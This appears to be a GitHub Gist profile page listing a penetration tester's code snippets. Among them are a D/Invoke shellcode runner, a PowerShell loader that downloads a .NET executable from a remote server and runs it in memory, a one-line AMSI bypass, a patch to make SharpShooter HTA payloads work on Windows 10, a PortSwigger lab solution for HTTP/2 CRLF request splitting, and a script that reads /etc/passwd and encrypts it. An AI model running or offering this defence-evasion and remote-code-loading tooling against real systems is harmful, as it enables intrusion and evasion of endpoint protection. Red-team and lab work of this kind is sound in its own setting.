Skip to content

Instantly share code, notes, and snippets.


Frank Spierings FrankSpierings

View GitHub Profile
FrankSpierings /
Created Jul 25, 2022
Install Burp CA Certificate on Magisk Rooted Device

Magisk Module

  • Use the modified Magisk module to install the certificate in both the user and the system store.
git clone
FrankSpierings /
Created Jul 21, 2022
Python3 solution to Portswigger's Lab; HTTP/2 request splitting via CRLF injection
# Thanks to h2 for the example code and thanks to Portswigger for the awesome free labs!
# -
# -
import socket
import ssl
import h2.connection
FrankSpierings / dinvoke-shellcode.cs
Last active May 19, 2022
D/Invoke Shellcode Runner
View dinvoke-shellcode.cs
- Compile: docker run --rm -it -v /tmp/data:/tmp/data mono csc /tmp/data/dinvoke-shellcode.cs -out:/tmp/data/dinvoke-shellcode.exe /platform:x64 /unsafe
- Reference (Thanks!) :
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.ComponentModel;
using Microsoft.Win32;
FrankSpierings / Invoke-SQLCmd.ps1
Last active Jan 12, 2022
Very basic Powershell script to execute a SQL Query and show the result in a GridView
View Invoke-SQLCmd.ps1
function Invoke-SQLCmd {
[string] $Server,
[string] $Database,
[string] $Query
FrankSpierings / sharpshooter-hta.diff
Last active Dec 8, 2021
Make HTA's work on Windows 10
View sharpshooter-hta.diff
diff --git a/ b/
index 9b10de1..50cece0 100644
--- a/
+++ b/
@@ -286,7 +286,7 @@ End Sub"""
raise Exception
if(payload_type == 1):
- if(args.comtechnique):
+ if(args.comtechnique or args.dotnetver == str(4)):
FrankSpierings / dynamic-main-load-executable-main.ps1
Last active Mar 9, 2022
Load the main of an executable from a remote server, without touching disk.
View dynamic-main-load-executable-main.ps1
$url = "http://server/dotnetexecutable"
$data = (New-Object System.Net.WebClient).DownloadData($url);
$assem = [System.Reflection.Assembly]::Load($data);
$main = $assem.EntryPoint
$main.Invoke(0, @(,[string[]]@("args0")));
View AMSI-disable.ps1
[Runtime.InteropServices.Marshal]::Copy([Int32[]]@(0), 0,(([Ref].Assembly.GetTypes()|?{$_.Name -like "*iUtils"}).GetFields('NonPublic,Static')|?{$_.Name -match "Context"}).GetValue($null), 1)
View shift-refactor-playground.js
const { refactor } = require('shift-refactor');
const { commonMethods } = require('refactor-plugin-common');
const Shift = require('shift-ast');
const fs = require('fs');
const src = `
var a = "aap";
function foo() {
function bar() {
FrankSpierings / sql-query-ps-oneliner.ps1
Last active Jul 14, 2021
PowerShell Oneliner to perform database queries.
View sql-query-ps-oneliner.ps1
powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$;$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap"
View read-file-aesencrypt-base54.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open);
$ms = New-Object System.IO.MemoryStream;
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.keysize = 128;
Write-Host "Key: " (($aes.Key |% ToString X2) -join '');
Write-Host "IV: " (($aes.IV |% ToString X2) -join '');
Write-Host "Mode: " $aes.mode
$cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write);